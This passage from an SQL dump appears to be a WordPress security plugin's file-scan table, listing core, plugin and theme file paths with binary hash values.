��K/3-n6\0�RB�֨G�','',0,'?'),('C�ms\n��X�]��K�T','wp-includes/blocks/search/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~d\r�7Xs/�fn5?��','�U��ˊ����\n\'��ޘ���据���8�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<;nDNe�(w��','5n(6eoY�Z��]�.Pq�I�eg6��v?c�sJ','',0,'?'),('C�g;f\"�>E��׷��','wp-includes/wp-includes/js/underscore.js',0,'�����$b��Z�C','�����$b��Z�C','�8A�2�xz��\0<G-�E	��r��쇮?�R�','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��rY���Qh��','����N盀�\n��6�uC5�i^ŗ�ȝޑ\'','',0,'?'),('C�9wVH���\"b��V#','wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qVO��%\n��N\nu','zk!N)�E����]��׹�;!���Q��','',0,'?'),('C�����!y�6�㋼','wp-includes/blocks/buttons/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���!r<�����','��ն�,*�͖��>3���x\r6����K�5','',0,'?'),('C�\"�@�7�t�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��U��O^�+}�z\r','���~��xs�T��x��q�e��\"y�y8','',0,'?'),('C��c&�*��pu,�','wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�t�:�����3_�,','Q�\r�2�n�][�8�@�:{�D�u��Ys$Ѻ�','',0,'?'),('Cۧ��7CvKw�ᔠ@�','wp-includes/wp-includes/css/dist/components/style-rtl.min.css',0,'\\�t�<���l�j�!','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('C�݆��m�hَpc','wp-content/plugins/wp-smushit/app/views/dashboard/directory-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�$X��k��&�)��','���Ժ�N��<J�K��<��	U�wR�Xm�*','',0,'?'),('C�=ʓ�me������','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',0,'�C�Ǻ\Z��.��զ','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���EF?xO\0��','�wwRŎ���I�|s��o-o���8��t� ','',0,'?'),('D\'�%��S�6�>�{','wp-includes/js/dist/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xq����y;�A]�@�','�V���/������B�ss%��|�^�ew8','',0,'?'),('D	(�,|����b?�L','wp-includes/blocks/query-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��*���l�:��\\w','��w9�C�1�\'�$�IN+��3ں�$�s','',0,'?'),('D�I�a��c�ᐸ�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/AuthorizationCode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RO���g���W��l','�+A�S�DY����d��ұ�/vLe̕3���','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D#q{ť���ԇb‚�','wp-includes/css/dist/customize-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��!�ް�d��9F�','A�5�\"c�R�%!�V..�&M�)A��?�_�','',0,'?'),('D-\Z�:����Xs���','wp-includes/wp-includes/js/quicktags.min.js',0,'	�w.PX�Mɇs�K!','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�)�W/P>����x�g','%F��Q��Tu��GY��D��^�۾','',0,'?'),('D/Ӵ�b\0����	u��','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�:G��W�ert(h��','>x��e\n�P�On��A^\'�F<у���0�~�0{�','',0,'?'),('D0T����3�yW\"�','wp-includes/wp-includes/sodium_compat/src/Core/X25519.php',0,'pZ�����:!�ټ�','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('DQ#�u��nU\\ @�<�','wp-includes/blocks/page-list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1\rJb��ޭ��ֳ','�yxQ{�0�I�Tcf�%���%�+�N�G�','',0,'?'),('DU}��<�޴D5�Y','wp-includes/block-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�dg��Dx�!�ixO�','B�-$ڰA��p��o�e;���)=uQrv]��','',0,'?'),('D`aO�\"Y%7��Z�','wp-includes/blocks/comments-pagination/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?[��lѐ���v+>�','����R�x�}��{��v�Fό�#�@��1�sF5�','',0,'?'),('Dm����o�\"���a�','wp-includes/blocks/gallery/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0S��U�\'��2dP�ڞ','��c\'��/D.h@���9~��#�7_�0?)�','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('Dx�ȳ)&47ܦң','wp-content/plugins/redirection/fileio/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؅�\"����>�?��}','˼��0y,s�?h{�|�hؠ\"Qv�����','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aի����� Lqw�	�','��r��_�iQ�	�a��R������+����','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4����=�ҩ���A','���0V�{]֊Aj�˫.%2\ZxM5�z �o� ','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e)�6]��3�S%]l�','�+�!���!ͳ�!n*#���~|x�[�','',0,'?'),('D�<��{��i���','wp-content/plugins/redirection/models/redirect/redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���k���bک�w','V�LI��M���r�9�.\Z�Jt��di ��`��','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7���N���mkt�','�\"\n8��?��8��Y���gU\"&��x[Apr','',0,'?'),('D�vX���\n�� w��','wp-content/plugins/wp-fastest-cache/js/lang/cn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�h8s�ne�ku��4�','����d�&�\0�e�M��n>XA�S�a��N','',0,'?'),('D�ý%9+(iC�	�','wp-content/plugins/wp-smushit/core/modules/helpers/class-dscanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�G���S-��\ZS','�\\I���\'�d7+���\\��UwT[>4V6(�','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�q(��t��ݣ˻','at�Á}(��0�oß%�3���p�u~�ĥ','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��.m�P\\�D�|w,','�:�g�LcX����u׾��ʹ�Z�K�[_y���','',0,'?'),('D�R��<ib�D�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/class-kirki-modules-webfont-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ph��!���أG�,t','ު��U]rG���}:��m1���!�K�','',0,'?'),('E�f�iL����&���','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',0,'*5���^gG�o<NN','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('E4��D\'BI���_#s','wp-includes/blocks/tag-cloud/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�B�n�E$�\Z�n\\','!���3��A����ou�5wt,,��','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':9��}�@W���͹','&��$�T`&T�{,��g�!z>5q��߶.,9�s','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�%���4m��`','��N8���:�.zw�Ӝ��>\\�%c�8���I','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`����gl�[4��D=��',';�r�U_j;�?�}\Z]����ɠޫ�r�ȵ���i','',0,'?'),('ERe��w9��x�','wp-content/plugins/wp-cerber/assets/flags/gh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$}\n*w�P��FȖ`��','W�6�v��Lb���ܬ9Gg��qe�F�4�iʥ4','',0,'?'),('Ed�M\0*�>Է�M���','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/link-count-tools-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c���_8�W8{�	�','��XU�8þx~�/�F�!�>]=���ڿU��','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('EuG|>/����u\Z�','wp-content/plugins/wordpress-seo/lib/abstract-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I[?�Gc�zc\ZA�','v�f�5��+��i����*�t~���s��/�\r','',0,'?'),('E��!����VdՀ�],|','wp-content/plugins/wp-cerber/assets/flags/ee.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2.jt&�{����f	T','��\n����զ��)8�qp�P�3o�o��\r','',0,'?'),('E�b�����O5�k#��','wp-content/plugins/redirection/locale/json/redirection-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s_�ۋ1�Q�-:A','K�J���$~,����3\\���uB5���1\Z�','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q�ܰ~!y�\\��na','.�#�qe},������-(���{�N��h%��','',0,'?'),('E���s=�]�����=a','wp-includes/blocks/post-template/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=I�.0S ��[eץΊ','\"����CN2�󕹖,�0�N�p�+)4�&�O�','',0,'?'),('E�n=>����.���;f','wp-includes/wp-includes/js/dist/data-controls.min.js',0,']���p���\r��sµ',']���p���\r��sµ','�ӝk?������?���d�<���vc','',0,'?'),('E�$����K��cm','wp-content/plugins/wp-cerber/languages/wp-cerber.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߔ�u�/�s{�M�','!v��h��`V�<��I$���c�E���>\r�','',0,'?'),('E����Y��W�T0�	)�','wp-content/themes/hitmag/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�WA�������l?�','`�Z[�F(�g����m�芔�tr\Z�R�3.]�1','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�iԎ��񝓓k�;','wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʂ���|��[��^A�','�\ra��uvt�x��H&���(h-��3���\Z��','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>��	��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\'q������g_J�','�CAM�k��o�x��apcKX��+�L�\r�H�','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�5�l-b��1t|=�[','BR��.vW��픱	�㨙�h�@���]e','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��������6���','���� iu��6#I�B3�f�A�\\\n<W�PAA�','',0,'?'),('F�|��b\\���tݎ�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/webfontloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~(��T*�� }C����','9���x#����B��!�E\n\Z|��j!��?���','',0,'?'),('F/(��xc���1p\"','wp-content/themes/hitmag/inc/kirki/controls/views/radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.3���g)*����)','x���:cHj���I� �b!��E�q��+_','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('F5\'�?��\0��?Fe_F','wp-includes/wp-includes/nav-menu.php',0,'(������%��ӯq','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('F@ v��h^)���Ӷ�','wp-includes/wp-includes/class-wp-widget-factory.php',0,'�ե�ᡵ���|��I� ','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��ˋ��R0w�M�Q�1','�_%~Wn��-I\n>���B��;�_|8ԤԂ�Q','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4P��\r�i�B�Be�','��q���Ѱ��ɧӿlpK�9 �^��/t��4,','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('FVJ�%T�yً�e�','wp-content/plugins/wordpress-seo/src/integrations/admin/cron-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��[.FpR��b','�ִkT��zgJ��g�B�je)�L�3','',0,'?'),('F`M߸c�N�!����','wp-includes/blocks/image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\rjR.�D�5|b+�R','A P�e��-�z���}@�.����u�\Z]u	Ծ','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ҫ����\"y�','X�Ϫ]y�?��9_�S�c�<QV���\\9.��','',0,'?'),('FrNC�+�<�M���','wp-content/plugins/wp-smushit/app/modals/progress-dialog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\0��K�L�i','ɗO�	>���ժ��B&�Bl��~p��۶a����','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n�	:�›{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F�j5\"g���ȿ�Z��','wp-includes/wp-includes/theme-compat/embed-404.php',0,'7�[R+S��A-\Za*e','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('F�>���bû��6���','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',0,'R���Z�?f.��8��	','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӿ6 <?�rk���','�����{z�|��F�I���챜�D�W�S�','',0,'?'),('F�\\\"�L����,4ꫥ','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�y���[ޙm�M^','��g��=H�ӗ���ւ�H��w/~����p--','',0,'?'),('F�x�\Z4I�hGbC@��a','wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�]�%��9eY)ژh','P�\r�_r��hBgXGH�����K<N�X�:��','',0,'?'),('F�p�J�,��`ndXV','wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�b1V����In','-�O)���Ap㸭e�꨸��\"�M�&�\nzd]�','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<����^�\r��q!\Z','�=Li7�	t�I}�|��9���oh��`o���=CD','',0,'?'),('F�.�c����\n��$`�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�h��y�O\\�P˶�\0F','k�v�\'��<��\Z�k�.�.�>	q��v��}EO�','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('G�?�cm�\nulf,1','wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css',0,'W.�M�л�=@�D�Yw#','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('G�|�xG��$�3V','wp-includes/wp-includes/css/dist/editor/style.css',0,'k����`�\0d���‘','k����`�\0d���‘','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('G�`(X�� ��','wp-includes/wp-includes/js/utils.js',0,'���2���![pNI�5','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dVND1�C����.','�?�\\v���ҧ�x�P�Ep����6��!IP','',0,'?'),('G!g]Ȯ��	A���\"4','wp-content/plugins/wp-cerber/assets/flags/mn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �f�����jM����A','&�(V�����$p��U��H\0@2Ou\ZW�z��2�/','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��O	�Oo�1��c','�<;�v��+E�6^>�hVby��v�;u�-','',0,'?'),('G:Z��]Y!tI����\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jI78�{��r�P�','Uk�������ZM=OEw�D���w�� |I�;','',0,'?'),('G:ȈVo�<�����','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-sk_SK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�܃0r��T\"\n�','ʠ�}ž��zS��Y��֞�A��dr�{�\'!Z\0�','',0,'?'),('G;)[}tڞ`8���C�','wp-includes/wp-includes/class-wp-user.php',0,'>��b�Zd��	��','>��b�Zd��	��','���mA�QW,�?�;��w�FT񎧳\\>��','',0,'?'),('GC���x,��[��','wp-content/themes/hitmag/inc/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϋ��- �=�z+��u�','�u�E�$�K$i*V�R5����Ξ~\'��9','',0,'?'),('GQ��{)?R�`���)�','wp-includes/blocks/post-comments-form/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2����G�\"���','-�0\'J�M”�ü�� z��	�byp��կ','',0,'?'),('Gi9��$�Lвu��U߬','wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6>}�\r+�D>��y','M��.��k�~�_+>`=�HϮ�2^x�E�o�','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('Gt�R{�2\r����k','wp-content/plugins/wp-fastest-cache/wpFastestCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ƉJE�c���DY','6ҹ=6�t1\";|��fY:妪g�4�G�ľo','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�`?���1�Fl','n�ص|�6GS�z\ZUS�c�hJ�톂I��u�S','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6,1�ž�','!n�>�v�ڄ�w֦�7C�y5�=��k��s','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���ZA��2Ϡ�,','+�bt�=U(��.�_��l�b����_P�$��W�}�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G��Lvy�Z�s��K���','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.full.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�}4���$Ȁ?1�v','��2�.TX�P��~�\"A���LS�M/-','',0,'?'),('G�F��X�8�\Z��3��','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d!�l�T�!�u��\r�E','�j9X���B�{�K[�)�q�-�4za�!;�\0','',0,'?'),('G�=��u\n��ˮ�\0V}','wp-includes/blocks/avatar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���^@�0%\r�M�ڙ','��ѳr��!�}0[,+_�yi�(d��7S��#\\','',0,'?'),('G���Y���lE{�','wp-includes/wp-includes/js/dist/escape-html.js',0,'�E����e����c�k�','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u%�^К`�3]@E?','�R��Қ*�ގ��I�T�\\�o�|���!�L%','',0,'?'),('G�BM��k�eY�m�]','wp-content/plugins/wp-cerber/assets/flags/dj.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��2�	��\n8C�','`��$⚌4‰��K;XΦ��%�!�fD�w','',0,'?'),('G��4o�c��%�k�','wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�Vn����Z','�M�����t�%�ֹ�,m�=V�NE\'�','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G�]�4��NH��','���[k��E��@�������y4d*@9|3)','',0,'?'),('G�q׃����B�:','wp-includes/wp-includes/images/wpicons-2x.png',0,'��n�V�o�$��Of~7','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('G���I#v��(���5r','wp-content/plugins/wp-fastest-cache/js/lang/fr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NZY�>-1I\\���*�','�	��!�hN�qp1��?��6>G��?N��','',0,'?'),('H\"���Yf�?�Zb','wp-content/plugins/wp-cerber/assets/flags/yt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[?k6_Όvv��Һ','�-�ˆ�_�iX���Ά<���R$�P)��d��','',0,'?'),('HW�\njO{0,ݢ��','wp-content/plugins/redirection/locale/redirection-es_VE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$đ�\\���L~�>','?)H�Q(�3?.d�u��6Nz�t�qؖ�D','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^�oA��hܦ3�\Z','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('Hا�-��q�\0m2�','wp-content/plugins/wp-cerber/assets/flags/al.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$~VGU�qP�/�0�','K�L��,�pY[���p�Hm��l�km�,/�','',0,'?'),('H �`�N��4/Q�Q�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pt-BR.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�-&l�?����O`�K','�e\nZ�xJu)\n7\n�2os{/1}CiF','',0,'?'),('H%��-y�P`djԒ�i,','wp-content/plugins/wordfence/modules/login-security/js/admin.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��ej����\'�I�7','U�%j�Għ���|]S�Щn2��P�T�+J','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӆ�\0NT��5~�]','P�l��f�� �z�HCqD�N>t�\r0�xF��','',0,'?'),('H=�3P;�T���~�','wp-includes/blocks/separator/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q����H�:d�)','�n�dm�e��Z�8�	